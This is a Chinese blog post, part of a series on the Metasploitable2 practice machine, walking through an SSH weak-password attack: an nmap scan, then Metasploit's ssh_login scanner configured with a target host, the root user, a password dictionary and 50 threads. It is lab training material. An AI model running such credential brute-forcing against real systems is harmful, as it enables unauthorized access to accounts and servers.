Metasploitable2靶机之第二篇--ssh密码获取 ゝ一世哀愁。 2022-11-16 01:44 225阅读 0赞 ### 文章目录 ### * * * 环境 * 主机ssh弱口令 * * 第一步 查看SSh端口是否开启 * 第二步 选择漏洞库 * 第三步 设置参数,开始攻击 * 第四步 利用成功,发现存在msfadmin * 摘抄 ### 环境 ### <table> <thead> <tr> <th>主机</th> <th>地址</th> </tr> </thead> <tbody> <tr> <td>Metasploitable2</td> <td>192.168.232.202</td> </tr> <tr> <td>kali-linux</td> <td>192.168.232.129</td> </tr> </tbody> </table> ### 主机ssh弱口令 ### #### 第一步 查看SSh端口是否开启 #### nmap –sV -O 192.168.232.202 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70] #### 第二步 选择漏洞库 #### search ssh use auxiliary/scanner/ssh/ssh_login ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1] ![在这里插入图片描述][20210402212201695.png] #### 第三步 设置参数,开始攻击 #### set RHOSTS 192.168.160.131set USERNAME root set PASS_FILE pass.txt(字典文件,需要预先生成) set THREADS 50 exploit ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3] #### 第四步 利用成功,发现存在msfadmin #### ![在这里插入图片描述][20210402212234445.png] ### 摘抄 ### -------------------- 我们还年轻, 长长的人生可以受一点风浪。 – 三毛 -------------------- [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221022/ee5eac3a5f72454b8983a3c3f8ec57c8.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221022/e0bd388778944a0dad3afcbc69efeabd.png [20210402212201695.png]: https://img-blog.csdnimg.cn/20210402212201695.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20210402212212697.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy,size_16,color_FFFFFF,t_70 [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20210402212220869.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy,size_16,color_FFFFFF,t_70 [20210402212234445.png]: https://img-blog.csdnimg.cn/20210402212234445.png
相关 Metasploitable2靶机之第三篇--Tomcat管理台弱口令漏洞 文章目录 环境搭建 描述 影响版本 漏洞利用 第一步 矫情吗;*/ 2022年11月16日 01:44/ 0 赞/ 224 阅读
相关 Metasploitable2靶机之第二篇--ssh密码获取 文章目录 环境 主机ssh弱口令 第一步 查看SSh端口是否开启 第二步 ゝ一世哀愁。/ 2022年11月16日 01:44/ 0 赞/ 226 阅读
相关 Metasploitable2靶机之第一篇--弱口令漏洞 文章目录 环境准备 telnet 弱口令 MySQL弱口令 PostgreSQL (对 淡淡的烟草味﹌/ 2022年11月16日 01:42/ 0 赞/ 244 阅读
相关 Metasploitable2靶机之第十一篇--Druby远程代码执行漏洞 文章目录 环境 漏洞利用 第一步 ,启动MSF 第二步选择 太过爱你忘了你带给我的痛/ 2022年10月22日 02:46/ 0 赞/ 220 阅读
相关 Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823) 文章目录 环境 原理 影响版本 漏洞利用 第一步 , 傷城~/ 2022年10月22日 02:46/ 0 赞/ 308 阅读
相关 Metasploitable2靶机之第八篇--UnreallRCd后门漏洞 文章目录 环境 漏洞利用 第一步 启动metasploit 电玩女神/ 2022年10月22日 02:46/ 0 赞/ 249 阅读
相关 Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞 文章目录 环境 原理 漏洞利用 第一步 ,查看1099端口是否开启 ゝ一纸荒年。/ 2022年10月22日 02:46/ 0 赞/ 294 阅读
相关 Metasploitable2靶机之第七篇--Distcc后门漏洞 文章目录 环境 原理 漏洞利用 第一步 ,启动metasploit 约定不等于承诺〃/ 2022年10月22日 01:40/ 0 赞/ 242 阅读
还没有评论,来说两句吧...